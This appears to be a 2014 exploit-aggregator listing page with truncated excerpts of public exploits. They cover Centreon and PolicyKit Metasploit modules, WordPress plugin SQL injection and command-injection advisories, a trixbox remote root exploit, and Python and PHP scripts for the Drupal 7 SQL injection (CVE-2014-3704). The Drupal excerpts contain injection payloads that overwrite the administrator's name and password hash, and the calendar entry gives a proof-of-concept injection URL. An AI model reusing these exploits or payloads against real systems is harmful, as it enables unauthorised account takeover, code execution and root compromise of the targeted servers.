Dell SonicWall GMS v7.2.x – Persistent Web Vulnerability

24 October 2014 - Source: http://www.mondounix.com
Document Title:
===============
Dell SonicWall GMS v7.2.x - Persistent Web Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1222
 
Release Date:
=============
2014-10-21
 
Vulnerability Laboratory ID (VL-ID):
====================================
1222
 
Common Vulnerability Scoring System:
====================================
3
 
Product & Service Introduction:
===============================
Dell SonicWALL's management and reporting solutions provide a comprehensive architecture for centrally creating and managing security policies, providing real-time monitoring and alerts, and delivering intuitive compliance and usage reports, all from...


Centreon SQL / Command Injection

24 October 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Centreon SQL and Command Injection',
      'Description'    => %q{
        This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
        Enterprise Server 2.2 and prior. Due to a combination of SQL injection and command
        injection in the displayServiceStatus.php component, it is possible to execute arbitrary
 ...


WordPress CP Multi View Event Calendar 1.01 SQL Injection

24 October 2014 - Source: http://www.mondounix.com
######################
 
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani 
 
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
 
# Date : 2014-10-23
 
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
 
# Description
 
CP Multi View Event Calendar 1.01 suffers from an SQL injection vulnerability
 
The calid variable is not sanitized.
 
######################
 
# PoC
 
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1...


WordPress Database Manager 2.7.1 Command Injection / Credential Leak

22 October 2014 - Source: http://www.mondounix.com
Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509
 
Description: "Allows you to optimize database, repair database, backup database, restore database, delete backup database, drop/empty tables and run selected queries. Supports automatic scheduling of backing up, optimizing and repairing of database."
 
Vulnerability:...


Drupal Core 7.32 SQL Injection (python Version)

19 October 2014 - Source: http://www.mondounix.com
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
  ...


Drupal Core 7.32 SQL Injection (PHP Version)

19 October 2014 - Source: http://www.mondounix.com
<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#
 
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'"...


Linux PolicyKit Race Condition Privilege Escalation

18 October 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class Metasploit4 < Msf::Exploit::Local
  Rank = GreatRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
 
  include Msf::Exploit::Local::Linux
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Linux PolicyKit Race Condition Privilege Escalation',
      'Description'   => %q(
        A race condition flaw was found in the PolicyKit pkexec utility and polkitd
        daemon. A local user could use this flaw to appear as a privileged user to
        pkexec, allowing them to execute arbitrary commands as root by running
...


Fonality Trixbox CE 2.8.0.4 Command Execution

17 October 2014 - Source: http://www.mondounix.com
#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user which then can be leveraged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL =...


Drupal 7.X SQL Injection

17 October 2014 - Source: http://www.mondounix.com
#!/usr/bin/python
#
# 
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other, creative application of this material.
# In any case you disagree with the above statement, stop here.
 
import hashlib, urllib2, optparse, random, sys
 
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal...
